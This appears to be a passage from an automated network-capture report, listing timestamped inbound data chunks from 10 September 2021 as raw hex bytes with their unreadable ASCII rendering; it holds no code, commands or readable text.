                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC112INData Raw: 09 2c 29 4f 7e d9 f4 8b 65 a5 fc 40 b2 54 94 b8 34 27 b7 b0 f8 80 a4 2d 8d a9 4d 8a cc 64 c7 c9 46 fb 7c 94 92 35 40 56 59 25 8d 24 5f fa e1 b5 8e 87 35 e0 71 d1 56 4e 17 50 77 b6 5d f3 e5 d1 54 61 42 8a 19 d2 a3 e1 d8 8a 13 7d e8 7d 22 48 e5 48 b9 78 f9 1d c9 0c 43 27 12 75 03 73 73 97 fa 2e 0d 0b 05 5c 7c 55 73 c0 b1 d7 25 aa 59 49 01 2c 75 06 b9 8b 16 a7 cc 79 69 50 38 83 35 9b 63 7e f6 e9 0c 9c 5c c7 c3 c9 c7 ec 48 e9 1a 65 bf 6c b5 6d fb 7c 85 1b ad 47 36 1b 70 36 4f 8b 3f 1d 0d 78 ac ec 08 a8 a5 76 e5 ae b0 4c 60 61 0d 84 93 c8 be 5c f9 fc c5 85 fa 5f ae 2c f3 65 69 59 51 ee 04 49 03 47 b8 c7 14 8b 36 d1 1c c5 cd 31 68 9b de a2 bc f8 3e 3a f4 b7 72 1f 27 1b 1b 77 cd b2 85 26 a0 a8 e2 50 71 5a 35 3b 7e 7d 22 f8 7d 30 f5 06 3e 26 0b e1 fe ac f3 63 42
                                                                                                                                                                                                                                  Data Ascii: ,)O~e@T4'-MdF|5@VY%$_5qVNPw]TaB}}"HHxC'uss.\|Us%YI,uyiP85c~\Helm|G6p6O?xvL`a\_,eiYQIG61h>:r'w&PqZ5;~}"}0>&cB
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC113INData Raw: 91 cf c7 84 d4 83 32 e0 87 a5 b5 61 5b c5 a4 bc 25 2c 54 41 2e df 01 b9 d7 d6 18 43 d7 f8 7a 27 dd c6 ce b1 40 ec 21 02 49 14 45 59 1b 42 db 35 6d de ae 76 dd 1d fe 2a ba 51 69 53 94 91 b3 8d f7 b7 a6 9a b4 58 cb 57 db 97 5f 11 a5 49 ad 41 b0 0c 34 f9 30 09 9d fd 44 7a 7f d2 da 8e 3e 87 93 9f 1a 3a e3 c8 d8 4f 3c dd a1 52 12 b1 c0 ee cc 29 e2 c8 e1 18 5a 85 91 18 1a 6a 30 32 15 3c 84 cb 49 2f e7 76 a6 b6 f3 d0 3c 4c f1 89 4b ae 6a d2 92 2a 00 50 67 a5 df bd 0c 24 7e a8 ff 00 5c 1e 9f c4 f4 ab 27 f8 ac 30 6a ba 7b c9 11 08 ed 24 e5 77 32 4e 90 c3 13 33 ca d8 d2 ad 4d 10 16 51 ac 02 48 1d 58 70 1f 44 e3 27 4d c2 99 65 89 f0 9a bb 6e 05 28 6b d2 29 fe a1 fe a4 e1 38 54 87 98 09 17 18 9d b3 d0 e6 ed f3 15 83 27 ff 00 6a 5b e2 e9 59 da 37 da e7 4f 3b 42 62 8b
                                                                                                                                                                                                                                  Data Ascii: 2a[%,TA.Cz'@!IEYB5mv*QiSXW_IA40Dz>:O<R)Zj02<I/v<LKj*Pg$~\'0j{$w2N3MQHXpD'Men(k)8T'j[Y7O;Bb
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC114INData Raw: 2e 59 55 1b 9a 64 f9 6b 78 8a 8a ee d6 a3 d5 b9 12 3a 67 e5 95 60 f5 d6 9b 91 99 98 9f 66 8d 34 98 12 38 8d d5 54 76 a3 c8 85 a1 c8 db 26 d6 12 49 20 2b b5 ae fb 28 57 cb 74 d4 89 a9 25 9e 81 c0 dc d6 97 f2 8e 2e 52 8a 42 88 04 ef a8 ea fa f2 3e 70 84 d7 3d 0f 97 a8 f6 cb 33 62 45 0e 53 34 c2 ca 3e e5 56 64 62 2c 1a 90 1b 60 37 2b 1a b3 7c 74 e2 54 93 4a ed d9 bd f6 b1 d2 02 bc bc e8 6b 4e 99 5f ce 04 72 7e 9e fa 75 0c 32 65 e2 c5 9b 2a 20 57 ee fb 90 d0 3b 49 05 88 24 b7 34 41 22 f8 af 83 30 a1 24 84 80 03 0a 3e 75 be b9 01 f3 0a 2b f9 2a 99 9a 6d 13 f8 1a 7e 16 99 8a 82 28 a3 c5 8c 01 ba 38 23 45 25 81 f6 01 c7 80 9c 13 e7 f1 d7 66 2c 2c 06 52 a9 46 7d cf 2c a9 e9 ac 78 84 84 38 03 1e 26 e4 29 db fa 5a 05 7d 5d f5 13 40 f4 8e 9f 95 a8 6a 5a 86 2e 14 18
                                                                                                                                                                                                                                  Data Ascii: .YUdkx:g`f48Tv&I +(Wt%.RB>p=3bES4>Vdb,`7+|tTJkN_r~u2e* W;I$4A"0$>u+*m~(8#E%f,,RF},x8&)Z}]@jZ.
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC115INData Raw: 17 32 32 ee 17 47 95 dc 3e 0a fe 05 74 cc 90 a7 4a 6f a8 fc 6f ae b5 8a b9 cd 55 12 c4 ba 70 e5 e5 7e 64 e6 63 93 df d4 5e 64 72 6b 52 a9 9b 6e e5 46 51 c1 12 1d 83 79 f3 57 ee e5 6b fb 7f 3b 7f a5 4b 4e 00 c5 e8 09 f5 24 5b 22 1b 93 e7 1f 3d fa dc d2 89 c4 0a bd 18 ee 6e 2a 33 2d ef 68 0a f4 f2 41 17 a7 fd 50 d3 76 c4 03 4c d0 74 f6 09 4a fb 32 f5 0e e4 b1 70 3d aa c8 bc 8f 3c 9b be 9a 41 51 e2 81 56 4a 6c ed 51 ae 77 fc c5 47 84 48 29 06 e0 9f 4b 0a 65 5c bc a0 8b e9 5e 30 9b 4a ca f7 01 b7 5c 99 f1 d2 30 c5 c4 4e 88 46 e2 28 7b 54 8a be 38 e7 c1 ba ff 00 ab 4c 22 66 1a 1b b7 e7 2b 7e b5 82 fd 3c 15 5e 82 dc d8 da bc fb 30 f5 81 31 a6 8a 28 25 92 68 0e 4a e4 60 34 8c 8b 22 99 5a f2 71 9d 53 ce f8 5d 08 22 ec ee b1 43 8e aa 25 2b c6 45 19 45 aa 2d 5b 53
                                                                                                                                                                                                                                  Data Ascii: 22G>tJooUp~dc^drkRnFQyWk;KN$["=n*3-hAPvLtJ2p=<AQVJlQwGH)Ke\^0J\0NF({T8L"f+~<^01(%hJ`4"ZqS]"C%+EE-[S
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC117INData Raw: 10 f6 2e 18 50 b8 d7 f4 1f 92 db ea 3c 93 cf a0 69 5a 34 4b b0 66 49 36 74 ac c5 83 08 f0 63 66 8e 30 41 03 99 9d 19 ae bf 60 bb ae b8 95 04 b9 6a b5 f4 20 75 cc bf 2e 91 02 71 2e 8f 71 ff 00 f2 9b 64 d6 ad 28 23 9c 3f 58 b5 8c 4c cc 5d 0f 0a 74 dd 97 87 1e 5e 14 93 1f 70 79 1b 78 70 41 16 2c d1 22 c8 35 c7 15 d2 25 8d 71 d7 91 1c e2 c2 5a 9c e6 06 99 1e 5c b5 e9 14 b7 d5 ef 2c 52 e6 63 e3 17 9a 18 71 62 56 00 0a 8e 54 85 d0 8f c9 5a 22 85 71 76 7c d7 44 42 b1 03 95 c5 41 63 6e 7c ea fe 75 83 10 10 41 48 2e 40 24 dd 9d bd 33 af f4 23 85 8e a3 17 11 56 31 26 4b ca 1b 22 71 ee 08 ab 8f 23 b4 66 35 1f b5 42 ad b0 f0 6b f1 d0 55 72 fd fe b4 86 d1 89 3e 22 71 24 e4 28 6f ce a4 f7 ac 46 66 43 10 4c af b9 94 63 e3 cf 8d 1b f7 99 37 14 8d ec 7b 4f ee 3c 91 c1 20
                                                                                                                                                                                                                                  Data Ascii: .P<iZ4KfI6tcf0A`j u.q.qd(#?XL]t^pyxpA,"5%qZ\,RcqbVTZ"qv|DBAcn|uAH.@$3#V1&K"q#f5BkUr>"q$(oFfCLc7{O<
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC118INData Raw: 5f d0 f9 8f a8 b6 16 4e 2e 7e 36 ad a3 64 69 59 f1 49 3b 09 e3 cb 6c 0c f8 b1 73 3b c4 76 d6 09 80 50 62 01 e2 2e a4 13 4e ae 17 8b e1 11 31 0a 48 2a 95 9a 81 f1 31 b8 04 0f 43 4e 91 73 c3 71 fc 3f 16 b1 31 13 4a 41 a8 4a 55 57 2e d5 49 bb 6b af 38 7e 7a 7b d5 1e 92 cf 9b d2 f9 7f 47 7d 53 ea 4f 48 6b 73 fd be 3e a5 e8 bd 77 51 9f 2b 13 23 2f ef a1 c5 dd a3 26 4c 8f 0b a9 ee f7 26 c6 81 c5 aa f0 a0 f3 d6 6f 8b e0 65 f1 d2 cc ce 26 48 4a ab fc 40 0d 9d 8d 2a 73 0d bc 6c fe 99 f5 5e 26 49 42 ff 00 dc 7d c4 26 81 20 d5 80 d7 32 cd fc b9 ed 16 a3 17 ea 9f ac 7d 1b ae c9 e9 4f a9 38 91 e9 f9 a7 22 1c 5c 5d 73 11 64 8f 4c cb 72 8a 52 09 5e 73 ff 00 05 28 8c 82 f1 92 55 99 8e d9 0d 80 32 3c 57 d2 42 09 1c 3b a8 0b 24 3e 24 d6 c5 db 3f 78 fa 07 0f f5 41 39 08 fb
                                                                                                                                                                                                                                  Data Ascii: _N.~6diYI;ls;vPb.N1H*1CNsq?1JAJUW.Ik8~z{G}SOHks>wQ+#/&L&oe&HJ@*sl^&IB}& 2}O8"\]sdLrR^s(U2<WB;$>$?xA9
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC119INData Raw: 61 18 3e a0 7f 4e de a0 f4 1f a7 f2 3d 53 ea 7c cd 23 4b d3 b0 70 72 33 66 92 5c c8 51 9d a3 70 b1 e3 62 40 c1 64 9a 69 58 d9 2a 0a c6 8a 58 b0 03 a6 65 4a 9d 35 58 52 5c 0b 38 2c 49 b5 aa f5 cb 3d 62 9b 8b fa ba 55 e2 51 4a 4e a4 a4 30 dc 96 f3 36 be 71 bb f5 1b fa 43 fe a9 7e 89 62 fa 0b d7 3f 55 7e 92 7a af d1 fe 95 f5 df a7 b4 cf 54 fa 4f d6 63 1e 7c ed 2e 6d 3f 51 43 36 9d 24 d9 98 e8 1f 48 ca 9f 1c 77 f0 be fa 24 c6 99 81 8e 19 e4 94 84 37 52 be 8c 26 ca 21 52 e4 be 6c 0b 97 cd e8 73 b0 7e 97 8a 6e 23 fd 42 91 35 27 ee 05 91 42 c1 bf 8b 36 af 7a 54 1a 3e f0 05 ea 3f a5 9f 51 74 46 c9 ca d6 b0 b5 0c 9c 68 f1 13 5f 7d 3b 56 56 4c bd 5d 18 19 f1 b3 16 67 0b 24 fd f8 d5 ff 00 51 58 c6 79 00 0f 01 19 9c 04 ee 0d 49 93 2f 14 bc 54 a3 84 dd d8 66 da e7 ac
                                                                                                                                                                                                                                  Data Ascii: a>N=S|#Kpr3f\Qpb@diX*XeJ5XR\8,I=bUQJN06qC~b?U~zTOc|.m?QC6$Hw$7R&!Rls~n#B5'B6zT>?QtFh_};VVL]g$QXyI/Tf
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC121INData Raw: 5a e3 55 2c c2 85 82 09 07 f1 d2 d2 46 30 b9 76 26 d9 81 5c f5 a0 6f 28 9a d2 b4 61 53 d2 8a 61 7f 3d f4 b3 5e 26 44 90 cf a9 65 40 62 55 c5 d5 20 86 6e e4 6c 05 33 a1 5c 84 26 b8 a1 21 6e 7c ee e3 c7 50 51 62 94 82 68 47 90 a7 c4 10 29 2b 9a 99 83 c2 90 92 14 92 ce 49 0c ff 00 9a d6 90 0f e9 4f f1 0d 28 67 68 e6 74 41 a7 65 e4 e2 fb b9 79 23 96 66 58 e2 8c 12 c8 c8 e0 a3 9e 6f dc 48 3c 13 d3 53 41 5b 28 f9 0b 91 72 47 77 a1 85 a5 0a 29 17 29 72 77 1a 0e 94 ad 32 78 92 38 c9 a7 e7 4f 1b cd 2c 98 b3 3c 3b 5e 2b 84 88 9d 44 b1 34 88 2a 9e 36 25 39 2d c2 91 f1 5d 0c ac 29 18 40 23 20 ed c8 bd 6a 3c b3 71 58 8a 52 a4 4c 4a 9f 0a 54 41 ab 97 07 b1 66 8b 0d e8 ac d6 79 61 53 1b 36 3e a5 00 c2 cc dc 79 3b e3 ed 07 2b e3 dc 59 28 1f 91 62 fa a3 9e 70 17 21 d8 8b
                                                                                                                                                                                                                                  Data Ascii: ZU,F0v&\o(aSa=^&De@bU nl3\&!n|PQbhG)+IO(ghtAey#fXoH<SA[(rGw))rw2x8O,<;^+D4*6%9-])@# j<qXRLJTAfyaS6>y;+Y(bp!
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC122INData Raw: 8f c1 ee 2e c8 f2 65 24 6d 00 32 92 76 82 79 da be e3 40 74 df 10 87 52 4a 6e 6f a0 25 b5 1d 0f a4 2d 21 4a c3 85 bf 8b d8 0c 9e cf d7 6b 8a 5e 26 be 97 e0 b6 a5 eb 2d 3b 29 16 bd e9 8d 98 28 ee 32 c2 e2 b6 95 b0 cc f1 95 6f ce d0 77 1b f0 af d4 3f e3 e0 cb 9a 80 7c 8f 20 c0 d3 7e 51 61 f4 a4 99 bc 60 05 2c d8 55 96 ae c4 77 95 84 76 eb e9 46 93 1c 9a 74 6b 1c 7f 69 34 4a 76 4c dd c5 31 f6 fd 90 b9 f1 6a e0 51 50 41 2a 7f b0 3f 36 9d 39 e6 90 4d cd d8 e7 a0 1d f4 8f ad f0 72 92 24 03 93 00 ed fe 59 8a 54 73 ae d0 67 8f 3c 18 9a 83 e1 e7 44 da 5e 54 53 9e dc 8e cc 31 dc fc 4f 8f 32 82 8f 04 c7 96 8d bf b1 50 41 e8 c8 49 52 1c 1f db bd 85 0f 3c f2 7b 47 15 88 28 d1 c6 4e 5b a9 78 80 f5 76 b5 ea 5f 4d 47 93 99 a2 88 27 ef 40 b2 40 71 b2 31 5a 19 40 07 7b 48
                                                                                                                                                                                                                                  Data Ascii: .e$m2vy@tRJno%-!Jk^&-;)(2ow?| ~Qa`,UwvFtki4JvL1jQPA*?69Mr$YTsg<D^TS1O2PAIR<{G(N[xv_MG'@@q1Z@{H
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC123INData Raw: c2 87 5a 54 dd f4 fe e3 5b c3 14 e1 0a 72 d9 30 35 a0 7a 7e 36 d2 97 ef d2 eb 93 0c 71 b2 06 99 64 4d 89 2c 8c 1a 32 50 80 46 3e ca 5f 1e 5c f1 c5 8b e9 49 a3 ec d5 39 f5 d9 fd 3d a9 71 0e 4a 06 62 85 69 99 26 c3 b7 a3 f5 06 2d 27 a3 4b e4 f6 bb 88 4b ef 8c a9 57 02 49 10 28 03 6b 35 29 65 3b 80 ae 1a af c9 1d 4d 21 4a 28 24 06 29 04 54 66 2f ad e9 6c ad 1c e2 12 12 0b 54 27 96 5f ab b6 9a 43 f7 4f 8c c7 04 68 21 4c c9 e7 97 f4 fb c8 7e e2 30 82 bf e7 70 8a 45 b6 e5 60 6f 8b 3b 7a b0 60 84 85 1a 02 1d ef 6b fb 3e 91 4a b5 26 62 c0 72 ef 66 3b bd bb 67 02 05 bd 45 8f 2b a4 f3 ce 67 ed 89 1d 8c d2 3a b8 53 ca 04 56 57 6b a2 18 a8 4b 0b b8 6d f9 ea ab 88 35 7a 10 de 1f 3e 4e 3c fa 56 2c f8 50 12 53 84 d4 b1 b0 16 d7 f6 39 91 58 af de a4 80 45 33 3a f1 1a 28
                                                                                                                                                                                                                                  Data Ascii: ZT[r05z~6qdM,2PF>_\I9=qJbi&-'KKWI(k5)e;M!J($)Tf/lT'_COh!L~0pE`o;z`k>J&brf;gE+g:SVWkKm5z>N<V,PS9XE3:(
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC124INData Raw: e7 5c eb 41 1c cd f4 c7 a9 be a1 e8 19 99 7a 4c 9e ac f5 0f a5 71 65 ce 18 f9 38 51 cd 3b 24 25 5a ce f8 77 c6 e8 39 17 b5 91 b8 16 4f 9e bb 31 1c 32 90 a4 89 21 45 55 67 0e 47 33 4b f7 58 1c 89 5c 7a 66 a5 6b 9c b4 4b 0a 01 c7 a6 9b 6d ad 04 5e 6f a5 58 7e a7 83 3b 13 d4 7e 90 d5 35 dc ef 51 a4 d1 64 6a f8 b9 f9 72 66 68 de a4 d2 51 6b ed 73 31 0e 40 8a 39 59 c7 7a 19 a3 91 1d 58 2c 72 5a 33 29 c6 fd 4d 5c 12 7e e4 b9 92 92 85 2d 2b 4a 4f 30 58 57 30 6b 4a d0 54 c7 d1 7e 8e 78 c3 31 0b 93 35 73 10 0a 5e b9 38 ce 87 22 3c f5 a7 72 7e 90 7a d0 eb 1e 9c d0 32 fe df 57 93 23 1f 1f 23 2b 35 32 31 a4 8d d7 32 48 c2 ce 32 34 f8 25 64 12 a4 9f f0 f8 aa 64 58 e1 58 c3 b9 08 a3 af 9f 71 a0 4b 59 4c bf 10 e4 cf d3 b2 3a 47 d4 fe 9f 30 ae 58 c4 4f dc dc 69 c8 33 d3
                                                                                                                                                                                                                                  Data Ascii: \AzLqe8Q;$%Zw9O12!EUgG3KX\zfkKm^oX~;~5QdjrfhQks1@9YzX,rZ3)M\~-+JO0XW0kJT~x15s^8"<r~z2W##+5212H24%ddXXqKYL:G0XOi3
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC126INData Raw: c9 92 c6 36 43 1e e7 0c ed 11 d8 19 1c 83 ed 29 ed 20 83 c8 04 1f 24 f5 c4 ad 4b a0 14 37 b7 3a 38 ae af 11 21 a8 6f f3 fd 77 94 33 74 7d 4d 1a 6d 41 23 11 b4 8e fd a9 29 8d bb 58 78 e6 f6 b1 01 18 11 b4 7c 32 90 7c f5 d5 78 7f 95 3d 5b 21 6d 5e d1 d0 92 7f b8 b8 1f 40 33 f4 c9 34 fd 4f 44 d6 b2 36 63 e3 b9 cd c2 ef 90 b1 46 ce eb 1e 44 08 19 86 d6 59 18 b5 12 4e d6 b0 6a fa f2 9a 98 49 3c 9b e6 17 59 48 cf 3a d0 de bb 53 ce bd 23 a7 c1 80 54 b7 dc 49 21 82 86 50 41 1c 1a 00 93 c7 e3 e6 ac 75 a7 fb 60 d3 0b 5a c2 da 77 61 93 46 2d 4a 0d 42 32 a3 ee 3b e5 1f 4b 31 60 89 1f 02 36 20 b5 d1 b2 2c 73 c9 e3 fb 71 d4 c4 b0 10 40 15 62 de 4f 9b 39 3b e7 48 ea 16 d5 b6 1a 9e 95 e5 af 28 f7 13 ab 17 28 07 0a 05 ed 3e c0 0d 57 3e 68 9e 7e 78 e8 48 04 06 62 ee 68 d9
                                                                                                                                                                                                                                  Data Ascii: 6C) $K7:8!ow3t}MmA#)Xx|2|x=[!m^@34OD6cFDYNjI<YH:S#TI!PAu`ZwaF-JB2;K1`6 ,sq@bO9;H((>W>h~xHbh
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC127INData Raw: 72 2e fa 1a 74 ad 4f 90 82 8f a5 1f 4c 7d 1d 2b 65 e9 3a 8c 78 df e2 d8 79 28 70 7e e3 dd 3b 06 61 76 aa 38 14 37 9b e4 29 a1 cf 43 e2 f8 be 2c ff 00 cb 2c a8 24 39 29 b5 8e 40 7a fc 98 b3 fa 2f 03 c1 25 49 93 35 29 2b 55 31 5a af 91 39 8f ef 38 e9 6f f4 f5 f4 e2 0f 4a eb 31 f7 a4 83 b5 91 34 53 ac 81 95 a2 29 2b 26 c8 1a 5d a4 fb 50 a9 40 df 90 b5 e0 75 de 0f ea d8 fc 2b f0 9c c2 8b 58 b6 75 7f 4f 99 fd 6f fd 3f 30 29 73 b8 75 25 48 3e 24 a4 31 21 34 bb 39 15 a9 0c d1 da ff 00 47 e8 b8 99 1a 2e 23 a3 06 2b 1e 38 66 00 0d ad 1a 6d 14 53 8a dd c7 f2 38 3d 3f f7 3e e2 c9 49 a1 4e 4a 0e 49 d0 37 ce fa 46 22 6c 89 92 9a 5c e4 12 ca 77 6b 6b b3 07 7d 22 89 7f 51 3f 47 72 7d 0f f5 2e 4f a8 71 2b 8d 27 d4 51 e3 ae 5e 47 6e 39 bb 19 91 06 4b 90 4a 8e ab 1c ca 42
                                                                                                                                                                                                                                  Data Ascii: r.tOL}+e:xy(p~;av87)C,,$9)@z/%I5)+U1Z98oJ14S)+&]P@u+XuOo?0)su%H>$1!49G.#+8fmS8=?>INJI7F"l\wkk}"Q?Gr}.Oq+'Q^Gn9KJB
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC128INData Raw: d8 46 b1 b0 44 ba 01 77 85 25 c6 e2 45 9f 03 f9 bb ea fa 72 84 b9 40 62 0e 05 9c 6d 70 f9 1e 71 9d e0 df 8a e2 8b 86 0f 98 a1 66 37 61 7c 9b c9 e1 77 a1 7d 2a ca d7 71 cc ba 8c 0f 24 b9 b3 92 d0 92 41 8a 39 2c 0e eb aa f2 b6 c2 40 57 dc 54 00 3a ad 44 d3 30 15 28 11 ce fd 1f cd b5 34 b4 5d 71 33 90 8a 21 81 14 c2 1b 56 ae 87 cf 2d 2b bd f5 73 42 f4 47 d3 5f 4c ea 9a a6 0e 1e 9b a5 c5 83 87 1e 2b 49 14 a5 f2 65 78 a2 ff 00 8d d4 25 b5 61 de 99 c1 11 2a 6d 63 27 24 ed 0d 5c 54 e2 a2 89 72 c1 c4 40 4b 0a d5 ef cf 9e bb 40 78 19 33 66 cc 54 d5 15 29 2f 88 06 70 05 68 d5 62 2d d1 e3 90 1e ad fa 45 f5 07 eb 86 ac b9 d8 de 9c d7 34 df 4b cd a8 61 e3 2e 4e b4 83 45 83 28 e5 c2 72 b1 9b 18 6a 8d 8c da 94 92 69 e1 f2 61 fb 54 9b 1d d0 31 0f bc 11 d6 8f 81 fa 3c e4
                                                                                                                                                                                                                                  Data Ascii: FDw%Er@bmpqf7a|w}*q$A9,@WT:D0(4]q3!V-+sBG_L+Iex%a*mc'$\Tr@K@x3fT)/phb-E4Ka.NE(rjiaT1<
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC129INData Raw: 84 fd 59 c7 d9 ea 76 1e e0 a3 1d e1 59 88 2e 64 6c 72 b6 37 0e 48 d8 c4 db 78 03 cf 27 ad 4f 0c ca 94 92 ee c0 1b e7 a5 29 f3 4a c6 3b 8d 51 95 30 a4 a4 b0 51 c8 86 70 ff 00 34 d7 df 9c df 59 b1 22 5d 5f 71 56 ed cd f7 1b 1f c6 fd f0 a4 6a 52 c8 24 c8 55 08 61 fc 7f 6e b5 1f 4e 98 a2 82 4d 5b 9b 30 a7 b1 24 67 f3 81 fa ce 15 cd a0 cb 21 66 be 99 36 56 84 87 a9 29 74 3c fd 35 d1 8c 50 69 d8 b0 c7 2f 07 fe 37 22 5e eb 8f 20 ed 46 45 15 cf 83 f9 a1 a1 92 28 95 24 d4 90 4d 5d 9d 85 83 db 33 7d ad 19 9e 20 e2 70 45 85 9b 46 3d 5d b4 f3 86 3f d2 3d 51 4f a7 34 cd c0 ba c5 8b 26 9d 99 ba 8b a6 5c 41 9a 29 51 ab 71 0e 8a 5c 0a fe 78 23 ac c7 d5 f8 72 67 ce 2a 2d 72 1e 80 8b 50 d2 fe f4 8b cf a7 a9 2b e1 e4 e0 16 15 c3 bd ad a5 7c 9a 2c 1e 01 c9 38 fa b6 2e 48 ee
                                                                                                                                                                                                                                  Data Ascii: YvY.dlr7Hx'O)J;Q0Qp4Y"]_qVjR$UanNM[0$g!f6V)t<5Pi/7"^ FE($M]3} pEF=]?=QO4&\A)Qq\x#rg*-rP+|,8.H
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC131INData Raw: 97 52 d5 53 47 74 dd 16 a5 2b e7 49 0a df fc bc 25 2f fb 97 80 07 b7 70 63 46 fa 5c ad 4c 6d 6f 50 0b f9 c1 f0 8d 2d 5b 6c fe d5 8e 5e 7d 53 d5 31 a6 f5 7e a9 8e 8a 46 12 ab 63 ec a5 61 be 1f d3 23 db 40 d0 4a 16 2c d5 5f 1d 22 7c 4b fc fa f9 c3 d2 be db 87 bf bf a3 6f ee f0 9d 7c 68 f0 bd 3c 64 94 92 e7 3b 24 c3 68 db 40 0e bb c2 95 51 b8 aa 3d a8 a0 41 af 9e 80 54 dc 4b 7f eb 6d 02 6a fa 56 a0 1d d8 43 a7 c3 21 43 22 b2 dd 7a f6 dc a3 6b d6 2e d8 9a 7e 8d 23 c4 a5 67 18 92 38 8d 0a b3 07 83 6e 39 66 3e 41 55 24 a9 b1 67 fd 3a 8a 26 39 50 37 c4 fd 09 35 ec 7b d0 c9 93 80 21 5f fa 85 7c 9a 6b d9 ab c2 9b 5d ed cf 23 13 00 d8 92 bf ea 0f dd 20 02 c4 6b f2 b4 7c d0 3e 3a 34 15 4a fb 89 ff 00 e1 af f6 74 f3 80 9f 56 c0 ab a3 e9 c5 83 18 19 8a c8 ef 4e ea d1
                                                                                                                                                                                                                                  Data Ascii: RSGt+I%/pcF\LmoP-[l^}S1~Fca#@J,_"|Ko|h<d;$h@Q=ATKmjVC!C"zk.~#g8n9f>AU$g:&9P75{!_|k]# k|>:4JtVN
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC132INData Raw: 03 56 36 1c 1f fa 03 81 c1 e3 48 b3 74 17 d4 ec 7a d2 b0 d4 97 54 fa b5 ad b3 4b 93 eb 8d 43 4e 5d c2 30 4e 7b b6 24 88 c1 f7 76 e1 84 8c 63 12 b0 da fb 96 c7 91 55 7d 51 71 1f 57 fa 94 c2 a5 19 c4 25 44 90 1c 58 92 de 8d e9 c8 6b be 9f fe 92 fa 3c 8c 2f c1 24 90 12 e7 52 33 35 cd 86 fa bc 2b 3d 4b f4 6b ea 0e a6 d9 1a ac 9a d6 66 46 4c 6e dd bc bc 5c e0 f3 36 50 e6 29 31 82 b1 31 16 6a ed 4f 1b 06 ed f0 ac ad 5d 25 27 ea dc 7c a9 8a 38 ca 82 a9 8b 5a 7b 0a d9 de ec 6c 75 32 3e 9f f4 7e 12 58 96 78 70 83 35 fc 0d bf 2b ed 6d 9c 98 ac 3e ab fe 83 bd 59 ea e9 26 f5 26 4c 9a 8c 7a fc 39 71 66 c1 a8 65 6e 79 71 f5 14 99 67 8f 21 25 9b f5 65 95 64 50 64 96 57 76 7b da db 87 3d 47 8c e2 66 f1 12 ca 96 54 49 0f d3 a7 ee 06 a9 fc 04 b5 19 32 52 10 10 70 b0 ce af
                                                                                                                                                                                                                                  Data Ascii: V6HtzTKCN]0N{$vcU}QqW%DXk</$R35+=KkfFLn\6P)11jO]%'|8Z{lu2>~Xxp5+m>Y&&Lz9qfenyqg!%edPdWv{=GfTI2Rp
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC133INData Raw: 63 87 19 59 93 b9 3f 76 27 78 b1 a4 f6 c8 e8 8c 38 02 8b 1a 1a 59 3f ea d7 06 62 e5 5f 31 98 21 ab e1 a7 bc 7c f7 8e ff 00 e9 ba 4c c2 99 33 0b 3d a8 cf 46 37 b9 d0 65 95 20 c3 d2 7a 26 36 1e a3 24 79 de a8 d3 62 8f 57 cd 97 2a 6c cd 13 45 ca 95 f1 f4 f8 f1 7b 65 f1 b1 a7 9b b6 92 48 e1 19 e4 75 74 8c a8 3d a3 7d 59 7f fc 55 c2 b0 79 5e 9f d7 c4 51 27 ff 00 a7 5c 47 dd f1 a6 83 54 d2 f4 6c b3 fe e1 99 f4 d7 27 e9 bf a0 75 6c fd 63 07 3f 33 d5 fa f4 f9 58 f3 43 a8 eb 50 47 a8 ea 18 8c 23 93 66 2e 1c 42 18 53 1c 8f d4 91 d6 28 c1 28 a1 9c fb 2f aa be 2f fd 59 fc d3 26 55 cb 26 9e 75 6a 6d cb 21 6d 17 05 ff 00 d3 f4 85 cb 33 07 85 2c fc fc b2 7e da 0c 7d 7b fd 52 e6 98 72 71 f1 bd 33 ea 2d 7f 52 c2 c8 8e 30 15 32 30 e4 8b 18 51 69 f1 70 8b 40 32 b0 c0 e5 b2
                                                                                                                                                                                                                                  Data Ascii: cY?v'x8Y?b_1!|L3=F7e z&6$ybW*lE{eHut=}YUy^Q'\GTl'ulc?3XCPG#f.BS((//Y&U&ujm!m3,~}{Rrq3-R020Qip@2
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC134INData Raw: c6 da c5 92 6a f2 45 8a f1 d2 f3 52 52 9f 05 1b 40 ce 28 ef c8 06 63 f3 59 81 8d 4a 3c df 5c dc e4 de 59 d9 e3 56 4d d9 fa 56 a3 a7 bc 23 7b a6 44 2c 97 e6 44 26 74 20 91 c2 92 0e d1 cf ee af e4 c9 23 14 c1 31 b9 39 37 6a 9a 52 ac 77 d8 da 06 9a 24 a4 54 1f 7c fc f4 f2 81 ef 4b e1 05 cc 90 e2 aa c8 8d 8a d0 cb 8c 59 bb 9d c9 06 e4 92 30 3f 70 8d 96 bf f0 1b 1f 3d 4e 79 70 93 a9 7f 38 ef 0f 52 51 70 92 43 f4 a3 0c bf 4d 94 13 49 94 f8 86 2c 98 a4 07 27 12 78 57 23 d8 05 43 32 10 c8 c1 87 b9 24 24 ae df 01 d7 fd 40 12 1d c6 c4 f5 f3 1e f4 f3 73 3e 05 e1 22 be f4 f7 03 5d 21 97 e9 ed 46 63 a6 ea 9a 6a ae e9 7b 0d 99 8a 42 ad 30 8c f7 21 65 0a 79 dd 19 60 d5 fe 65 3c df 1d 57 cd 96 04 d0 bb 31 26 9d e9 f8 8b 19 58 55 2d 6e 1c 86 c2 72 66 b6 ff 00 8b e5 18 f4
                                                                                                                                                                                                                                  Data Ascii: jERR@(cYJ<\YVMV#{D,D&t #197jRw$T|KY0?p=Nyp8RQpCMI,'xW#C2$$@s>"]!Fcj{B0!ey`e<W1&XU-nrf
